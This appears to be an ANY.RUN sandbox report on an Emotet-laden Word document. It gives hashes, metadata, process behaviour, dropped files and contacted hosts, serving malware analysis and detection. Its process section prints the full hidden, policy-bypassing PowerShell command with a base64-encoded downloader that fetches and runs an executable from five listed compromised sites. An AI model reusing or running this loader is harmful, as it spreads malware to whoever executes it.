analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

0D5C10011D1E0E9C3BF88BC256F924BEFB807D4B.doc

Full analysis: https://app.any.run/tasks/18095490-020f-47a6-8885-ac757d9fdb20
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: May 20, 2019, 11:09:12
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
opendir
emotet-doc
emotet
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Games, Kids & Shoes Drives, Subject: Cotton, Author: Abel Borer, Comments: matrices CSS system-worthy, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon May 20 08:57:00 2019, Last Saved Time/Date: Mon May 20 08:57:00 2019, Number of Pages: 1, Number of Words: 10, Number of Characters: 62, Security: 0
MD5:

E7D5AA054DEDC247B143D9AFEACDA04B

SHA1:

0D5C10011D1E0E9C3BF88BC256F924BEFB807D4B

SHA256:

6AF8AF05389A1DC356E8C5EDCCBD10149EDF3A0D88F4C3DB0A94B771E18D0DBC

SSDEEP:

3072:r077HUUUUUUUUUUUUUUUUUUUTkOQePu5U8qfW22snSsNGYTWhBxc:I77HUUUUUUUUUUUUUUUUUUUT52VMW22W

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    No malicious indicators.
  • SUSPICIOUS

    • PowerShell script executed

      • powershell.exe (PID: 2724)
    • Creates files in the user directory

      • powershell.exe (PID: 2724)
    • Executed via WMI

      • powershell.exe (PID: 2724)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2952)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2952)
    • Reads settings of System Certificates

      • powershell.exe (PID: 2724)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
Title: Games, Kids & Shoes Drives
Subject: Cotton
Author: Abel Borer
Keywords: -
Comments: matrices CSS system-worthy
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2019:05:20 07:57:00
ModifyDate: 2019:05:20 07:57:00
Pages: 1
Words: 10
Characters: 62
Security: None
CodePage: Windows Latin 1 (Western European)
Company: Howell - Torphy
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 71
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
Manager: Hamill
No data.
screenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
36
Monitored processes
2
Malicious processes
0
Suspicious processes
1

Behavior graph

Click at the process to see the details
start winword.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
2952"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\0D5C10011D1E0E9C3BF88BC256F924BEFB807D4B.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2724powershell -ExecutionPolicy bypass -WindowStyle Hidden -noprofile -e JABUADcAXwA2ADQANQAzADMAPQAnAGMAXwA3ADQANQA3ADcAJwA7ACQATgAzADkANQBfAF8ANgA1ACAAPQAgACcAMgA0ACcAOwAkAG4AMAAyADIAXwA0ADEAPQAnAGMAMwA0ADgANgA3ADEAMQAnADsAJABrADgAMwA3AF8AMAA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQATgAzADkANQBfAF8ANgA1ACsAJwAuAGUAeABlACcAOwAkAHIANQA4ADEAMAAzAD0AJwBWADEANAA1ADYANwBfACcAOwAkAE0AMgAxADQAMQA4AD0AJgAoACcAbgAnACsAJwBlAHcAJwArACcALQBvAGIAJwArACcAagBlAGMAdAAnACkAIABOAEUAYABUAC4AVwBFAEIAQwBgAEwAYABJAGAARQBuAFQAOwAkAEIAMgA4ADgANgAwADMAPQAnAGgAdAB0AHAAOgAvAC8AcwBhAG0AaQBuAHAAcgBpAG4AdABlAHIALgBjAG8AbQAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAHkAcgBrAHYAbQA0AHYAeQB5AF8AeQBiAGkAZABiAC0ANAAzADcANAA1ADIAMAA3AC8AQABoAHQAdABwADoALwAvAHMAYQBuAHQAdQBhAHIAaQBvAGEAcABhAHIAZQBjAGkAZABhAG0AbwBuAHQAZQBzAGUALgBjAG8AbQAuAGIAcgAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvADcAagBuADkAcAA3AF8AcQBvAHUANAA5AGIAagBvAGQAeAAtADMAMwA5ADUAMwAvAEAAaAB0AHQAcAA6AC8ALwBzAGUAcgB3AGkAcwBrAG8AbgBzAG8AbAAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAEoARQBzAGYAWQB1AGkAUABNAHYALwBAAGgAdAB0AHAAcwA6AC8ALwBwAHAAZABpAGEAbQBvAG4AZABzAC4AYwBvAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAG0ANAA1AHoAdgAwADMANwB1AGMAXwBuAGUAbgB0ADgANQBkAGEAYQBpAC0AMgA4ADIAMAA2ADcALwBAAGgAdAB0AHAAOgAvAC8AYQB3AG8AcgBsAGQAdABvAHUAcgBpAHMAbQAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AMQBmAGMAagBjADgAXwBtADQAbABuAGoANwBmAGYAbgBnAC0ANwA1ADUAMQAwADAALwAnAC4AUwBQAGwAaQB0ACgAJwBAACcAKQA7ACQAVgAwADYAXwA0AF8ANQA9ACcATgA0ADEAOQA0ADYAJwA7AGYAbwByAGUAYQBjAGgAKAAkAGsAOQA2ADgAOAAyADYAXwAgAGkAbgAgACQAQgAyADgAOAA2ADAAMwApAHsAdAByAHkAewAkAE0AMgAxADQAMQA4AC4AZABPAHcAbgBsAG8AYQBkAGYASQBMAGUAKAAkAGsAOQA2ADgAOAAyADYAXwAsACAAJABrADgAMwA3AF8AMAApADsAJAB6ADEAMQAwADQAXwA4ADgAPQAnAGIAMwA5ADgAOAA0ACcAOwBJAGYAIAAoACgAJgAoACcARwBlAHQAJwArACcALQBJAHQAZQBtACcAKQAgACQAawA4ADMANwBfADAAKQAuAEwARQBOAGcAdABIACAALQBnAGUAIAAyADEAMgA1ADgAKQAgAHsALgAoACcASQBuAHYAbwAnACsAJwBrAGUALQBJAHQAZQAnACsAJwBtACcAKQAgACQAawA4ADMANwBfADAAOwAkAGoANAA2ADUANAA5AD0AJwB2ADcAOAA4ADAAMQA5ADgAJwA7AGIAcgBlAGEAawA7ACQAaQAyAF8AOQAzADkAPQAnAEUANQA3ADgAOAA4ADgANAAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABZADgAOAAyADgAMQA5AD0AJwBjADgAMgAxADEAMAAzADUAJwA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 362
Read events
889
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
0
Unknown types
7

Dropped files

PID
Process
Filename
Type
2952WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVREA20.tmp.cvr
MD5:
SHA256:
2724powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\B4QMOIUDCXEZVAC8E4Q8.temp
MD5:
SHA256:
2952WINWORD.EXEC:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exdtlb
MD5:DB70316640E4E193FDF518ADEEC5F5BD
SHA256:85DE90243F24505D57654EEC98DCC07048C3962D26947698EA3F4B88F7B16FFA
2952WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B05563DC.wmfwmf
MD5:B46C02436390E7E149BF61A43F0DE864
SHA256:1AE479987780D1211FD0BBAB5FE4B2B242B37FC1ED51443D3DB0438C2A188862
2952WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\773B521E.wmfwmf
MD5:DD25CB503A2E7B0FEFBD077D15AA76CF
SHA256:69832E6095A4CB4F7957DCF719313FF37442D28D20798F31B0BE402439071D30
2724powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF14f403.TMPbinary
MD5:5F9A7BF5388376D94C2EDCA422810BEC
SHA256:8B2183F4F2F735C231B1F81D46CB86CB1FB51168824DE82F3A9EA79C12CAF82C
2952WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$5C10011D1E0E9C3BF88BC256F924BEFB807D4B.docpgc
MD5:320AA165402A24D41AEC6F179A4020FF
SHA256:D6C5CDFC8906D9BD4B98894B0BC70AC423FB87B420DF1FAA13738E58659367DE
2952WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C4402851.wmfwmf
MD5:12749EE7DA290892EEE06700CF24DA98
SHA256:40481E7A1708403333B431446E2801482DF48F5E18925AAB00415A8F42A1CF54
2952WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B5A91F87.wmfwmf
MD5:02BBC7D518EEE6BA7D6A88446AE37236
SHA256:E30F4B5C13F7504F6A4BD48397C2FFA852D084644FFBF281F82B068E084FB3A7
2724powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:5F9A7BF5388376D94C2EDCA422810BEC
SHA256:8B2183F4F2F735C231B1F81D46CB86CB1FB51168824DE82F3A9EA79C12CAF82C
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
4
TCP/UDP connections
5
DNS requests
5
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2724
powershell.exe
GET
404
54.38.130.145:80
http://serwiskonsol.com/wp-content/JEsfYuiPMv/
FR
xml
345 b
unknown
2724
powershell.exe
GET
404
192.99.62.163:80
http://santuarioaparecidamontese.com.br/wp-includes/7jn9p7_qou49bjodx-33953/
CA
xml
345 b
suspicious
2724
powershell.exe
GET
404
171.22.26.29:80
http://saminprinter.com/wp-includes/yrkvm4vyy_ybidb-43745207/
GB
xml
345 b
suspicious
2724
powershell.exe
GET
404
199.250.205.232:80
http://aworldtourism.com/wp-includes/1fcjc8_m4lnj7ffng-755100/
US
xml
345 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2724
powershell.exe
171.22.26.29:80
saminprinter.com
GB
suspicious
2724
powershell.exe
54.38.130.145:80
serwiskonsol.com
OVH SAS
FR
unknown
2724
powershell.exe
192.99.62.163:80
santuarioaparecidamontese.com.br
OVH SAS
CA
unknown
2724
powershell.exe
104.27.179.199:443
ppdiamonds.co
Cloudflare Inc
US
shared
2724
powershell.exe
199.250.205.232:80
aworldtourism.com
US
unknown

DNS requests

Domain
IP
Reputation
saminprinter.com
  • 171.22.26.29
suspicious
santuarioaparecidamontese.com.br
  • 192.99.62.163
suspicious
serwiskonsol.com
  • 54.38.130.145
unknown
ppdiamonds.co
  • 104.27.179.199
  • 104.27.178.199
suspicious
aworldtourism.com
  • 199.250.205.232
malicious

Threats

No threats detected
No debug info